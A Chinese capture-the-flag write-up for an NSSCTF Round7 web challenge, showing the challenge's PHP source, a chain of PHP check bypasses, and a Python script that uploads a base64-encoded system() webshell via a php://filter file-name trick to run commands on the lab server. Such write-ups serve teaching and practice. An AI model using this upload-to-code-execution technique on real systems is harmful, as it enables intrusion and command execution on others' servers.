前言

第一关要么去扫目录，要么网络那里的提示，然后主要讲讲第二关工具的使用和第三关的脚本编写和解法

解题

<?php
header('get:S0uRc3');
error_reporting(0);
set_include_path('Round7/');
// include: Nss
// include: level2
if (isset($_GET['0o0'])) {
    $O0O = file_get_contents($_GET['0o0'],1);
    if (strpos($O0O, 'Round7') === 0) {
        die('NO!!!!!   Permission denied!');
    } else if (strpos($O0O, 'Xy1on') === 0) {
        echo $O0O;
        die();
    } else {
        die("Nothing!!!");
    }
}
if(isset($_GET['S0uRc3'])){
    highlight_file(__FILE__);
    $O0O = file_get_contents('CTF',1);
    echo $O0O;
}else{
    echo "Nothing here";

}
?>

要求读取文件必须以Xy1on开头才能读取，我们又不能控制文件内容，这里工具一把梭哈


访问Ns_SCtF.php，得到源码:

<?php
error_reporting(0);
highlight_file(__FILE__);

$NSSCTF = $_GET['NSSCTF'] ?: '';
$NsSCTF = $_GET['NsSCTF'] ?: '';
$NsScTF = $_GET['NsScTF'] ?: '';
$NsScTf = $_GET['NsScTf'] ?: '';
$NSScTf = $_GET['NSScTf'] ?: '';
$nSScTF = $_GET['nSScTF'] ?: '';
$nSscTF = $_GET['nSscTF'] ?: '';

if ($NSSCTF != $NsSCTF && sha1($NSSCTF) === sha1($NsSCTF)) {
    if (!is_numeric($NsScTF) && in_array($NsScTF, array(1))) {
        if (file_get_contents($NsScTf) === "Welcome to Round7!!!") {
            if (isset($_GET['nss_ctfer.vip'])) {
                if ($NSScTf != 114514 && intval($NSScTf, 0) === 114514) {
                    $nss = is_numeric($nSScTF) and is_numeric($nSscTF) !== "NSSRound7";
                    if ($nss && $nSscTF === "NSSRound7") {
                        if (isset($_POST['submit'])) {
                            $file_name = urldecode($_FILES['file']['name']);
                            $path = $_FILES['file']['tmp_name'];
                            if(strpos($file_name, ".png") == false){
                                die("NoO0P00oO0! Png! pNg! pnG!");
                            }
                            $content = file_get_contents($path);
                            $real_content = '<?php die("Round7 do you like");'. $content . '?>';
                            $real_name = fopen($file_name, "w");
                            fwrite($real_name, $real_content);
                            fclose($real_name);
                            echo "OoO0o0hhh.";
                        } else {
                            die("NoO0oO0oO0!");
                        }
                    } else {
                        die("N0o0o0oO0o!");
                    }
                } else {
                    die("NoOo00O0o0!");
                }
            } else {
                die("Noo0oO0oOo!");
            }
        } else {
            die("NO0o0oO0oO!");
        }
    } else {
        die("No0o0o000O!");
    }
} else {
    die("NO0o0o0o0o!");
} NO0o0o0o0o!

首先是各自绕过，第一层数组绕过，NSSCTF[]=1&NSSCTF[]=2，第二层是in_array()第三个参数没有直接strict导致可以绕过，NsScTF=1q，第三层是伪协议NsScTf=data://text/plain,Welcome to Round7!!!，第四层nss_ctfer.vip注意变为nss[ctfer.vip(因为PHP匹配的时候会自动将[.变成下划线，有且仅变一次)，第五层是intval()绕过，字符串使用科学计数法，会默认是前面的数字，比如’1e1’转化变成1，NSScTf=114514e1，第五层直接nSScTF=1，$nSscTF=NSSRound7。这里的关键是文件上传，通过strops()检测文件的名称是否存在png，直接改增加png即可绕过，关键是会将<?php die(“Round7 do you like”);写入到文件中，所以就导致了传入的虽然是php文件，但是会终止。这里也是使用上面同一个tips，使用过滤器使用文件，如php://filter/write=convert.base64-decode/resource=aiwin.png.php，让写入内容进行base64解码，这里要使用URL编码，绕过/resource=aiwin.png.php作为文件名，然后在文件写入的内容中构造base64，使得<?php die(“Round7 do you like”);被不正常解码，造成死亡绕过。

import requests
def get_flag(URL):
    url = f"{URL}/Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTF=1%00&NsScTf=data://text/plain,Welcome%20to%20Round7!!!&nss[ctfer.vip=true&NSScTf=114514e1&nSScTF=1&nSscTF=NSSRound7"
    data = {'submit': 'submit'}

    payload = "PD9waHAgc3lzdGVtKCdjYXQgL2hvbWUvZjFhZycpOz8+" # 修改为自己想要执行的命令

    file2 = {'file': (
    '%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%6c%6a%6c%2e%70%6e%67%2e%70%68%70',
    f"aaa{payload}")}
    requests.post(url, files=file2, data=data)
    nssctf_text3 = requests.post(f'{URL}/ljl.png.php').text
    print(nssctf_text3)


if __name__ == "__main__":
    get_flag("http://node5.anna.nssctf.cn:28439/")